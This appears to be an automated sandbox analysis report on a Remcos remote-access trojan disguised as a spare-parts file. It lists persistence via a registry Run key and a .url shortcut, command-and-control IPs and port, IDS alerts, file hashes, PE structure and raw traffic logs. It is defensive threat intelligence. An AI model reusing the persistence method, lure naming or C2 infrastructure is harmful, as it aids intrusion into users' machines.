                      Detection:MAL
                      Classification:mal100.troj.expl.evad.winEXE@9/5@5/3
                      EGA Information:
                      • Successful, ratio: 100%
                      HDC Information:
                      • Successful, ratio: 97.7% (good quality ratio 85.2%)
                      • Quality average: 76.6%
                      • Quality standard deviation: 34.4%
                      HCA Information:
                      • Successful, ratio: 100%
                      • Number of executed functions: 58
                      • Number of non-executed functions: 66
                      Cookbook Comments:
                      • Found application associated with file extension: .exe
                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, wuapihost.exe
                      • Excluded domains from analysis (whitelisted): client.wns.windows.com, fs.microsoft.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com
                      • Not all processes where analyzed, report is missing behavior information
                      • Report creation exceeded maximum time and may have missing disassembly code information.
                      • Report size exceeded maximum capacity and may have missing behavior information.
                      • Report size getting too big, too many NtOpenFile calls found.
                      • Report size getting too big, too many NtOpenKeyEx calls found.
                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                      • Report size getting too big, too many NtQueryValueKey calls found.

                      Time | Type | Description
                      17:08:29 | API Interceptor | 1x Sleep call for process: DWG spare parts 455RTMGF Model.exe modified
                      17:08:34 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Uuddcmhn C:\Users\Public\Libraries\nhmcdduU.url
                      17:08:42 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Uuddcmhn C:\Users\Public\Libraries\nhmcdduU.url
                      17:08:48 | API Interceptor | 2x Sleep call for process: Uuddcmhn.exe modified
                                                              • 79.134.225.116
                                                              NEWFILE.EXE.exeGet hashmaliciousBrowse
                                                              • 79.134.225.18
                                                              TNT AWB TRACKING DETAILS.exeGet hashmaliciousBrowse
                                                              • 79.134.225.115
                                                              SecuriteInfo.com.W32.AIDetectNet.01.21512.exeGet hashmaliciousBrowse
                                                              • 79.134.225.20
                                                              ACH Payments.xlsGet hashmaliciousBrowse
                                                              • 79.134.225.8
                                                              ach payment 082422.xlsGet hashmaliciousBrowse
                                                              • 79.134.225.115
                                                              RFQ Number OQ22021653 .exeGet hashmaliciousBrowse
                                                              • 79.134.225.94
                                                              GiroSwift.exeGet hashmaliciousBrowse
                                                              • 79.134.225.30
                                                              No context
                                                              No context
                                                              Process:C:\Users\user\Desktop\DWG spare parts 455RTMGF Model.exe
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):480659
                                                              Entropy (8bit):7.62462346641683
                                                              Encrypted:false
                                                              SSDEEP:6144:jrTXX3LmixWq7CZa6Lq9RbXexQVfidsgSIyt7vn5/ASMxTwJIVY/qT6IWJr3Nl:Lrm586LqvLfidsgSIyt7v5/Av4Aar3j
                                                              MD5:BDA5D05E69D1250185EB2A960559D745
                                                              SHA1:2A7F2817700777EEB0EF7696C7D5E690B0569A8B
                                                              SHA-256:28FED22EE035133150117308519D9E27BA54195987582A21128ED1DB2499DC46
                                                              SHA-512:299042F47CB7723B3A0C9A9F8EC2F73FF2B5B572BF2CECB9A8BB5BFC8E5FFEA8C9F6445C38885EF9B8984FE8FF996C7160A0617CF82F81B92F72F2869C84CA22
                                                              Malicious:true
                                                              Reputation:low
                                                              Process:C:\Users\user\Desktop\DWG spare parts 455RTMGF Model.exe
                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):932352
                                                              Entropy (8bit):6.888508368562933
                                                              Encrypted:false
                                                              SSDEEP:12288:WZ3m2ifTnKeXXOeh0jbXGrapowu0ZCWNDoCHjsG83q/rhf7fvQBc:A9irKeXXOehw2rapowuCCsoT3q/lvkc
                                                              MD5:E9D007AC53470351186A5B53BC180ED3
                                                              SHA1:E1411689C7EB12DC132DB9496F25736FBA5E9F0D
                                                              SHA-256:C60E8A14ABC81AE3F2FFBE04B32240A92B900107E4ACC9EB88E43632AEE1266C
                                                              SHA-512:EEDD82A4F7756D9B197E0190065B20A1AB3D4FED6900D72E816D7303F3F511F87F4EEFDE3F450D2202EE5AFF5364D4F5943D63D1D1B0F04C7FB84EA93D1F515F
                                                              Malicious:true
                                                              Reputation:low
                                                              Preview:MZ~.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................4...........D.......P....@..............................................@..............................$*...p...B.......................k..................................................................................text...(........................... ..`.itext.......0.......(.............. ..`.data........P.......>..............@....bss.....8...p.......\...................idata..$*.......,...\..............@....tls....4................................rdata..............................@..@.reloc...k.......l..................@..B.rsrc....B...p...D..................@..@.....................<..............@..@................................................................................................
                                                              Process:C:\Users\user\Desktop\DWG spare parts 455RTMGF Model.exe
                                                              File Type:ASCII text, with CRLF line terminators
                                                              Category:dropped
                                                              Size (bytes):26
                                                              Entropy (8bit):3.95006375643621
                                                              Encrypted:false
                                                              SSDEEP:3:ggPYV:rPYV
                                                              MD5:187F488E27DB4AF347237FE461A079AD
                                                              SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                              SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                              SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                              Malicious:true
                                                              Reputation:high, very likely benign file
                                                              Preview:[ZoneTransfer]....ZoneId=0
                                                              Process:C:\Users\user\Desktop\DWG spare parts 455RTMGF Model.exe
                                                              File Type:MS Windows 95 Internet shortcut text (URL=<file:"C:\\Users\\Public\\Libraries\\Uuddcmhn.exe">), ASCII text, with CRLF line terminators
                                                              Category:modified
                                                              Size (bytes):99
                                                              Entropy (8bit):4.9258974387519805
                                                              Encrypted:false
                                                              SSDEEP:3:HRAbABGQYmTWAX+rSF55i0XMAINLJIvsGKd5Nt1AXvn:HRYFVmTWDyzSZJIvsb5C/n
                                                              MD5:D3F653ECF64BDBB3454D8CA7CEC72616
                                                              SHA1:19190178B4EEC89FAB68D42F0D60BE6F430141ED
                                                              SHA-256:96922567D02DA5AF96C658D43C51028308D60BD8BD997094EEC5B4014A5AAC83
                                                              SHA-512:3DD4C70494E838720CBB9ACFB7CDD9C7C8E0009DA1E2D2B77630F29077090A630874E01760407DF089ECCDD4EBC4B181D76AFCE6ADC63879AEA55FCF67C9ACBB
                                                              Malicious:false
                                                              Yara Hits:
                                                              • Rule: Methodology_Shortcut_HotKey, Description: Detects possible shortcut usage for .URL persistence, Source: C:\Users\Public\Libraries\nhmcdduU.url, Author: @itsreallynick (Nick Carr)
                                                              • Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: C:\Users\Public\Libraries\nhmcdduU.url, Author: @itsreallynick (Nick Carr)
                                                              Reputation:low
                                                              Preview:[InternetShortcut]..URL=file:"C:\\Users\\Public\\Libraries\\Uuddcmhn.exe"..IconIndex=15..HotKey=5..
                                                              Process:C:\Users\user\Desktop\DWG spare parts 455RTMGF Model.exe
                                                              File Type:HTML document, ASCII text
                                                              Category:dropped
                                                              Size (bytes):945
                                                              Entropy (8bit):4.99976713795867
                                                              Encrypted:false
                                                              SSDEEP:12:tklWnd6UGkMyGWKyMPVGADxapaiH8GdAPORkoao9W7im51w7j9eF6xIjSat5Rt8P:ql6dVauKyM85266m7p9xZPn
                                                              MD5:3861CFACAE1FE80283E6D3A8CBA98B8E
                                                              SHA1:D11CBE1449EA9072FECF3A5F75616EB2966205A2
                                                              SHA-256:54F669BBD15EEBD1464CD7E8780382211DD7E637D03E88C832B90B94E3133AC6
                                                              SHA-512:B5034F3BDCE7548D2BB3B2A3A718F59A1B302C2F4FB8B45588FCBB0C1170E50016735B4A09A67F36471F94F509EDF6D27427D61C761E5A181091E780146CAC69
                                                              Malicious:false
                                                              Reputation:low
                                                              Preview:{. "geoplugin_request":"84.17.52.43",. "geoplugin_status":200,. "geoplugin_delay":"2ms",. "geoplugin_credit":"Some of the returned data includes GeoLite data created by MaxMind, available from <a href='http:\/\/www.maxmind.com'>http:\/\/www.maxmind.com<\/a>.",. "geoplugin_city":"Zurich",. "geoplugin_region":"Zurich",. "geoplugin_regionCode":"ZH",. "geoplugin_regionName":"Zurich",. "geoplugin_areaCode":"",. "geoplugin_dmaCode":"",. "geoplugin_countryCode":"CH",. "geoplugin_countryName":"Switzerland",. "geoplugin_inEU":0,. "geoplugin_euVATrate":false,. "geoplugin_continentCode":"EU",. "geoplugin_continentName":"Europe",. "geoplugin_latitude":"47.43",. "geoplugin_longitude":"8.5718",. "geoplugin_locationAccuracyRadius":"1000",. "geoplugin_timezone":"Europe\/Zurich",. "geoplugin_currencyCode":"CHF",. "geoplugin_currencySymbol":"CHF",. "geoplugin_currencySymbol_UTF8":"CHF",. "geoplugin_currencyConverter":0.9635.}
                                                              File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                              Entropy (8bit):6.888508368562933
                                                              TrID:
                                                              • Win32 Executable (generic) a (10002005/4) 99.81%
                                                              • Windows Screen Saver (13104/52) 0.13%
                                                              • Win16/32 Executable Delphi generic (2074/23) 0.02%
                                                              • Generic Win/DOS Executable (2004/3) 0.02%
                                                              • DOS Executable Generic (2002/1) 0.02%
                                                              File name:DWG spare parts 455RTMGF Model.exe
                                                              File size:932352
                                                              MD5:e9d007ac53470351186a5b53bc180ed3
                                                              SHA1:e1411689c7eb12dc132db9496f25736fba5e9f0d
                                                              SHA256:c60e8a14abc81ae3f2ffbe04b32240a92b900107e4acc9eb88e43632aee1266c
                                                              SHA512:eedd82a4f7756d9b197e0190065b20a1ab3d4fed6900d72e816d7303f3f511f87f4eefde3f450d2202ee5aff5364d4f5943d63d1d1b0f04c7fb84ea93d1f515f
                                                              SSDEEP:12288:WZ3m2ifTnKeXXOeh0jbXGrapowu0ZCWNDoCHjsG83q/rhf7fvQBc:A9irKeXXOehw2rapowuCCsoT3q/lvkc
                                                              TLSH:72159FF7F2F08B33D0131A7DCA7732999A7D7E602820744B67E53A48DFB8541242A967
                                                              File Content Preview:MZ~.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................
                                                              Icon Hash:33d8dcd6d6d8d007
                                                              Entrypoint:0x4644b0
                                                              Entrypoint Section:.itext
                                                              Digitally signed:false
                                                              Imagebase:0x400000
                                                              Subsystem:windows gui
                                                              Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                                                              DLL Characteristics:
                                                              Time Stamp:0x2A425E19 [Fri Jun 19 22:22:17 1992 UTC]
                                                              TLS Callbacks:
                                                              CLR (.Net) Version:
                                                              OS Version Major:4
                                                              OS Version Minor:0
                                                              File Version Major:4
                                                              File Version Minor:0
                                                              Subsystem Version Major:4
                                                              Subsystem Version Minor:0
                                                              Import Hash:382d9c538727c04c8c0ffa65db10afc6
                                                              Instruction
                                                              push ebp
                                                              mov ebp, esp
                                                              add esp, FFFFFFF0h
                                                              mov eax, 00462A90h
                                                              call 00007FD51CA414BDh
                                                              mov eax, dword ptr [00466B1Ch]
                                                              mov eax, dword ptr [eax]
                                                              call 00007FD51CA914F5h
                                                              mov eax, dword ptr [00466B1Ch]
                                                              mov eax, dword ptr [eax]
                                                              mov edx, 00464510h
                                                              call 00007FD51CA90F7Ch
                                                              mov ecx, dword ptr [00466934h]
                                                              mov eax, dword ptr [00466B1Ch]
                                                              mov eax, dword ptr [eax]
                                                              mov edx, dword ptr [00462790h]
                                                              call 00007FD51CA914E4h
                                                              mov eax, dword ptr [00466B1Ch]
                                                              mov eax, dword ptr [eax]
                                                              call 00007FD51CA91558h
                                                              call 00007FD51CA3F31Bh
                                                              add byte ptr [eax], al
| Name | Virtual Address | Virtual Size | Is in Section |
| --- | --- | --- | --- |
| IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_IMPORT | 0x6b000 | 0x2a24 | .idata |
| IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x77000 | 0x74214 | .rsrc |
| IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x70000 | 0x6bb0 | .reloc |
| IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_TLS | 0x6f000 | 0x18 | .rdata |
| IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_IAT | 0x6b7cc | 0x68c | .idata |
| IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 | |
| Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics |
| --- | --- | --- | --- | --- | --- | --- | --- | --- |
| .text | 0x1000 | 0x61d28 | 0x61e00 | False | 0.5269346663473818 | data | 6.5520535208916 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ |
| .itext | 0x63000 | 0x151c | 0x1600 | False | 0.4794034090909091 | data | 5.734511848958881 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ |
| .data | 0x65000 | 0x1cc4 | 0x1e00 | False | 0.40091145833333336 | data | 3.8120626934413533 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
| .bss | 0x67000 | 0x38cc | 0x0 | False | 0 | empty | 0.0 | IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
| .idata | 0x6b000 | 0x2a24 | 0x2c00 | False | 0.30823863636363635 | data | 5.077763944032896 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
| .tls | 0x6e000 | 0x34 | 0x0 | False | 0 | empty | 0.0 | IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
| .rdata | 0x6f000 | 0x18 | 0x200 | False | 0.05078125 | data | 0.2044881574398449 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
| .reloc | 0x70000 | 0x6bb0 | 0x6c00 | False | 0.6401548032407407 | data | 6.699520587980857 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ |
| .rsrc | 0x77000 | 0x74214 | 0x74400 | False | 0.4358303931451613 | data | 6.380771448539127 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
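| Name | RVA | Size | Type | Language | Country |
| --- | --- | --- | --- | --- | --- |
| RT_BITMAP | 0x77774 | 0x1d0 | data | English | United States |
| RT_BITMAP | 0x77944 | 0x1e4 | data | English | United States |
| RT_BITMAP | 0x77b28 | 0x1d0 | data | English | United States |
| RT_BITMAP | 0x77cf8 | 0x1d0 | data | English | United States |
| RT_BITMAP | 0x77ec8 | 0x1d0 | data | English | United States |
| RT_BITMAP | 0x78098 | 0x1d0 | data | English | United States |
| RT_BITMAP | 0x78268 | 0x1d0 | data | English | United States |
| RT_BITMAP | 0x78438 | 0x1d0 | data | English | United States |
| RT_BITMAP | 0x78608 | 0x1d0 | data | English | United States |
| RT_BITMAP | 0x787d8 | 0x1d0 | data | English | United States |
| RT_ICON | 0x789a8 | 0x1a68 | data | | |
| RT_ICON | 0x7a410 | 0x468 | GLS_BINARY_LSB_FIRST | | |
| RT_STRING | 0x7a878 | 0xbc | data | | |
| RT_STRING | 0x7a934 | 0x3f0 | data | | |
| RT_STRING | 0x7ad24 | 0x1f8 | data | | |
| RT_STRING | 0x7af1c | 0xcc | data | | |
| RT_STRING | 0x7afe8 | 0x10c | data | | |
| RT_STRING | 0x7b0f4 | 0x31c | data | | |
| RT_STRING | 0x7b410 | 0x3c8 | data | | |
| RT_STRING | 0x7b7d8 | 0x370 | data | | |
| RT_STRING | 0x7bb48 | 0x3cc | data | | |
| RT_STRING | 0x7bf14 | 0x214 | data | | |
| RT_STRING | 0x7c128 | 0xcc | data | | |
| RT_STRING | 0x7c1f4 | 0x194 | data | | |
| RT_STRING | 0x7c388 | 0x3c4 | data | | |
| RT_STRING | 0x7c74c | 0x338 | data | | |
| RT_STRING | 0x7ca84 | 0x294 | data | | |
| RT_RCDATA | 0x7cd18 | 0x6dc22 | GIF image data, version 89a, 236 x 419 | English | United States |
| RT_RCDATA | 0xea93c | 0x10 | data | | |
| RT_RCDATA | 0xea94c | 0x348 | data | | |
| RT_GROUP_ICON | 0xeac94 | 0x22 | data | | |
| RT_VERSION | 0xeacb8 | 0x55c | data | English | United States |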
| DLL | Import |
| --- | --- |
| oleaut32.dll | SysFreeString, SysReAllocStringLen, SysAllocStringLen |
| advapi32.dll | RegQueryValueExA, RegOpenKeyExA, RegCloseKey |
| user32.dll | GetKeyboardType, DestroyWindow, LoadStringA, MessageBoxA, CharNextA |
| kernel32.dll | GetACP, Sleep, VirtualFree, VirtualAlloc, GetCurrentThreadId, InterlockedDecrement, InterlockedIncrement, VirtualQuery, WideCharToMultiByte, MultiByteToWideChar, lstrlenA, lstrcpynA, LoadLibraryExA, GetThreadLocale, GetStartupInfoA, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetLastError, GetCommandLineA, FreeLibrary, FindFirstFileA, FindClose, ExitProcess, CompareStringA, WriteFile, UnhandledExceptionFilter, SetFilePointer, SetEndOfFile, RtlUnwind, ReadFile, RaiseException, GetStdHandle, GetFileSize, GetFileType, CreateFileA, CloseHandle |
| kernel32.dll | TlsSetValue, TlsGetValue, LocalAlloc, GetModuleHandleA |
| user32.dll | CreateWindowExA, WindowFromPoint, WaitMessage, UpdateWindow, UnregisterClassA, UnhookWindowsHookEx, TranslateMessage, TranslateMDISysAccel, TrackPopupMenu, SystemParametersInfoA, ShowWindow, ShowScrollBar, ShowOwnedPopups, SetWindowsHookExA, SetWindowTextA, SetWindowPos, SetWindowPlacement, SetWindowLongW, SetWindowLongA, SetTimer, SetScrollRange, SetScrollPos, SetScrollInfo, SetRect, SetPropA, SetParent, SetMenuItemInfoA, SetMenu, SetForegroundWindow, SetFocus, SetCursor, SetClassLongA, SetCapture, SetActiveWindow, SendMessageW, SendMessageA, ScrollWindow, ScreenToClient, RemovePropA, RemoveMenu, ReleaseDC, ReleaseCapture, RegisterWindowMessageA, RegisterClipboardFormatA, RegisterClassA, RedrawWindow, PtInRect, PostQuitMessage, PostMessageA, PeekMessageW, PeekMessageA, OffsetRect, OemToCharA, MessageBoxA, MapWindowPoints, MapVirtualKeyA, LoadStringA, LoadKeyboardLayoutA, LoadIconA, LoadCursorA, LoadBitmapA, KillTimer, IsZoomed, IsWindowVisible, IsWindowUnicode, IsWindowEnabled, IsWindow, IsRectEmpty, IsIconic, IsDialogMessageW, IsDialogMessageA, IsChild, InvalidateRect, IntersectRect, InsertMenuItemA, InsertMenuA, InflateRect, GetWindowThreadProcessId, GetWindowTextA, GetWindowRect, GetWindowPlacement, GetWindowLongW, GetWindowLongA, GetWindowDC, GetTopWindow, GetSystemMetrics, GetSystemMenu, GetSysColorBrush, GetSysColor, GetSubMenu, GetScrollRange, GetScrollPos, GetScrollInfo, GetPropA, GetParent, GetWindow, GetMessageTime, GetMessagePos, GetMenuStringA, GetMenuState, GetMenuItemInfoA, GetMenuItemID, GetMenuItemCount, GetMenu, GetLastActivePopup, GetKeyboardState, GetKeyboardLayoutNameA, GetKeyboardLayoutList, GetKeyboardLayout, GetKeyState, GetKeyNameTextA, GetIconInfo, GetForegroundWindow, GetFocus, GetDesktopWindow, GetDCEx, GetDC, GetCursorPos, GetCursor, GetClipboardData, GetClientRect, GetClassLongA, GetClassInfoA, GetCapture, GetActiveWindow, FrameRect, FindWindowA, FillRect, EqualRect, EnumWindows, EnumThreadWindows, EnumChildWindows, EndPaint, EnableWindow, EnableScrollBar, EnableMenuItem, DrawTextA, DrawMenuBar, DrawIconEx, DrawIcon, DrawFrameControl, DrawEdge, DispatchMessageW, DispatchMessageA, DestroyWindow, DestroyMenu, DestroyIcon, DestroyCursor, DeleteMenu, DefWindowProcA, DefMDIChildProcA, DefFrameProcA, CreatePopupMenu, CreateMenu, CreateIcon, ClientToScreen, CheckMenuItem, CallWindowProcA, CallNextHookEx, BeginPaint, CharNextA, CharLowerBuffA, CharLowerA, CharToOemA, AdjustWindowRectEx, ActivateKeyboardLayout |
| gdi32.dll | UnrealizeObject, StretchBlt, SetWindowOrgEx, SetWinMetaFileBits, SetViewportOrgEx, SetTextColor, SetStretchBltMode, SetROP2, SetPixel, SetMapMode, SetEnhMetaFileBits, SetDIBColorTable, SetBrushOrgEx, SetBkMode, SetBkColor, SelectPalette, SelectObject, SaveDC, RestoreDC, RectVisible, RealizePalette, PlayEnhMetaFile, PatBlt, MoveToEx, MaskBlt, LineTo, LPtoDP, IntersectClipRect, GetWindowOrgEx, GetWinMetaFileBits, GetTextMetricsA, GetTextExtentPoint32A, GetSystemPaletteEntries, GetStockObject, GetRgnBox, GetROP2, GetPixel, GetPaletteEntries, GetObjectA, GetEnhMetaFilePaletteEntries, GetEnhMetaFileHeader, GetEnhMetaFileDescriptionA, GetEnhMetaFileBits, GetDeviceCaps, GetDIBits, GetDIBColorTable, GetDCOrgEx, GetCurrentPositionEx, GetClipBox, GetBrushOrgEx, GetBitmapBits, ExcludeClipRect, DeleteObject, DeleteEnhMetaFile, DeleteDC, CreateSolidBrush, CreatePenIndirect, CreatePalette, CreateHalftonePalette, CreateFontIndirectA, CreateEnhMetaFileA, CreateDIBitmap, CreateDIBSection, CreateCompatibleDC, CreateCompatibleBitmap, CreateBrushIndirect, CreateBitmap, CopyEnhMetaFileA, CloseEnhMetaFile, BitBlt |
| version.dll | VerQueryValueA, GetFileVersionInfoSizeA, GetFileVersionInfoA |
| kernel32.dll | lstrcpyA, WriteFile, WaitForSingleObject, VirtualQuery, VirtualProtect, VirtualAlloc, TlsFree, SizeofResource, SetThreadLocale, SetFilePointer, SetEvent, SetErrorMode, SetEndOfFile, ResetEvent, ReadFile, MultiByteToWideChar, MulDiv, LockResource, LoadResource, LoadLibraryA, LeaveCriticalSection, InitializeCriticalSection, GlobalUnlock, GlobalSize, GlobalLock, GlobalFree, GlobalFindAtomA, GlobalDeleteAtom, GlobalAlloc, GlobalAddAtomA, GetVersionExA, GetVersion, GetUserDefaultLCID, GetTickCount, GetThreadLocale, GetStdHandle, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetLocalTime, GetLastError, GetFullPathNameA, GetDiskFreeSpaceA, GetDateFormatA, GetCurrentThreadId, GetCurrentProcessId, GetCurrentProcess, GetComputerNameA, GetCPInfo, FreeResource, InterlockedExchange, FreeLibrary, FormatMessageA, FlushInstructionCache, FindResourceA, EnumCalendarInfoA, EnterCriticalSection, DeleteCriticalSection, CreateThread, CreateFileA, CreateEventA, CompareStringA, CloseHandle |
| advapi32.dll | RegQueryValueExA, RegOpenKeyExA, RegFlushKey, RegCloseKey |
| oleaut32.dll | GetErrorInfo, GetActiveObject, SysFreeString |
| ole32.dll | CreateStreamOnHGlobal, IsAccelerator, OleDraw, OleSetMenuDescriptor, CoTaskMemFree, ProgIDFromCLSID, StringFromCLSID, CoCreateInstance, CoGetClassObject, CoUninitialize, CoInitialize, IsEqualGUID |
| kernel32.dll | Sleep |
| oleaut32.dll | SafeArrayPtrOfIndex, SafeArrayGetUBound, SafeArrayGetLBound, SafeArrayCreate, VariantChangeType, VariantCopy, VariantClear, VariantInit |
                                                              comctl32.dll_TrackMouseEvent, ImageList_SetIconSize, ImageList_GetIconSize, ImageList_Write, ImageList_Read, ImageList_DragShowNolock, ImageList_DragMove, ImageList_DragLeave, ImageList_DragEnter, ImageList_EndDrag, ImageList_BeginDrag, ImageList_Remove, ImageList_DrawEx, ImageList_Draw, ImageList_GetBkColor, ImageList_SetBkColor, ImageList_Add, ImageList_GetImageCount, ImageList_Destroy, ImageList_Create
Language of compilation system | Country where language is spoken
English | United States
Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
09/16/22-17:08:58.134170 | TCP | 2850263 | ETPRO TROJAN MalDoc Downloader User-Agent | 49731 | 80 | 192.168.2.7 | 141.8.192.151
09/16/22-17:08:30.690772 | TCP | 2850263 | ETPRO TROJAN MalDoc Downloader User-Agent | 49721 | 80 | 192.168.2.7 | 141.8.192.151
09/16/22-17:08:49.810384 | TCP | 2850263 | ETPRO TROJAN MalDoc Downloader User-Agent | 49727 | 80 | 192.168.2.7 | 141.8.192.151
09/16/22-17:10:37.016548 | TCP | 2032777 | ET TROJAN Remcos 3.x Unencrypted Server Response | 2442 | 49725 | 79.134.225.115 | 192.168.2.7
09/16/22-17:08:34.884246 | TCP | 2032776 | ET TROJAN Remcos 3.x Unencrypted Checkin | 49725 | 2442 | 192.168.2.7 | 79.134.225.115
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                              Sep 16, 2022 17:08:31.072180986 CEST8049722141.8.192.151192.168.2.7
                                                              Sep 16, 2022 17:08:31.072231054 CEST8049722141.8.192.151192.168.2.7
                                                              Sep 16, 2022 17:08:31.072236061 CEST4972280192.168.2.7141.8.192.151
                                                              Sep 16, 2022 17:08:31.072280884 CEST8049722141.8.192.151192.168.2.7
                                                              Sep 16, 2022 17:08:31.072280884 CEST4972280192.168.2.7141.8.192.151
                                                              Sep 16, 2022 17:08:31.072330952 CEST4972280192.168.2.7141.8.192.151
                                                              Sep 16, 2022 17:08:31.072331905 CEST8049722141.8.192.151192.168.2.7
                                                              Sep 16, 2022 17:08:31.072382927 CEST4972280192.168.2.7141.8.192.151
                                                              Sep 16, 2022 17:08:31.072386026 CEST8049722141.8.192.151192.168.2.7
                                                              Sep 16, 2022 17:08:31.072438002 CEST8049722141.8.192.151192.168.2.7
                                                              Sep 16, 2022 17:08:31.072438955 CEST4972280192.168.2.7141.8.192.151
                                                              Sep 16, 2022 17:08:31.072485924 CEST8049722141.8.192.151192.168.2.7
                                                              Sep 16, 2022 17:08:31.072487116 CEST4972280192.168.2.7141.8.192.151
                                                              Sep 16, 2022 17:08:31.072540045 CEST8049722141.8.192.151192.168.2.7
                                                              Sep 16, 2022 17:08:31.072540998 CEST4972280192.168.2.7141.8.192.151
                                                              Sep 16, 2022 17:08:31.072591066 CEST8049722141.8.192.151192.168.2.7
                                                              Sep 16, 2022 17:08:31.072596073 CEST4972280192.168.2.7141.8.192.151
                                                              Sep 16, 2022 17:08:31.072643042 CEST8049722141.8.192.151192.168.2.7
                                                              Sep 16, 2022 17:08:31.072643995 CEST4972280192.168.2.7141.8.192.151
                                                              Sep 16, 2022 17:08:31.072693110 CEST8049722141.8.192.151192.168.2.7
                                                              Sep 16, 2022 17:08:31.072694063 CEST4972280192.168.2.7141.8.192.151
                                                              Sep 16, 2022 17:08:31.072742939 CEST8049722141.8.192.151192.168.2.7
                                                              Sep 16, 2022 17:08:31.072758913 CEST4972280192.168.2.7141.8.192.151
                                                              Sep 16, 2022 17:08:31.072793007 CEST8049722141.8.192.151192.168.2.7
                                                              Sep 16, 2022 17:08:31.072796106 CEST4972280192.168.2.7141.8.192.151
                                                              Sep 16, 2022 17:08:31.072844982 CEST8049722141.8.192.151192.168.2.7
                                                              Sep 16, 2022 17:08:31.072844982 CEST4972280192.168.2.7141.8.192.151
                                                              Sep 16, 2022 17:08:31.072896957 CEST4972280192.168.2.7141.8.192.151
                                                              Sep 16, 2022 17:08:31.072897911 CEST8049722141.8.192.151192.168.2.7
                                                              Sep 16, 2022 17:08:31.072949886 CEST8049722141.8.192.151192.168.2.7
                                                              Sep 16, 2022 17:08:31.072949886 CEST4972280192.168.2.7141.8.192.151
                                                              Sep 16, 2022 17:08:31.072999954 CEST8049722141.8.192.151192.168.2.7
                                                              Sep 16, 2022 17:08:31.073003054 CEST4972280192.168.2.7141.8.192.151
                                                              Sep 16, 2022 17:08:31.073050022 CEST8049722141.8.192.151192.168.2.7
                                                              Sep 16, 2022 17:08:31.073054075 CEST4972280192.168.2.7141.8.192.151
                                                              Sep 16, 2022 17:08:31.073101044 CEST8049722141.8.192.151192.168.2.7
                                                              Sep 16, 2022 17:08:31.073102951 CEST4972280192.168.2.7141.8.192.151
                                                              Sep 16, 2022 17:08:31.073152065 CEST8049722141.8.192.151192.168.2.7
                                                              Sep 16, 2022 17:08:31.073153019 CEST4972280192.168.2.7141.8.192.151
                                                              Sep 16, 2022 17:08:31.073204041 CEST8049722141.8.192.151192.168.2.7
                                                              Sep 16, 2022 17:08:31.073204994 CEST4972280192.168.2.7141.8.192.151
                                                              Sep 16, 2022 17:08:31.073254108 CEST8049722141.8.192.151192.168.2.7
                                                              Sep 16, 2022 17:08:31.073257923 CEST4972280192.168.2.7141.8.192.151
                                                              Sep 16, 2022 17:08:31.073303938 CEST8049722141.8.192.151192.168.2.7
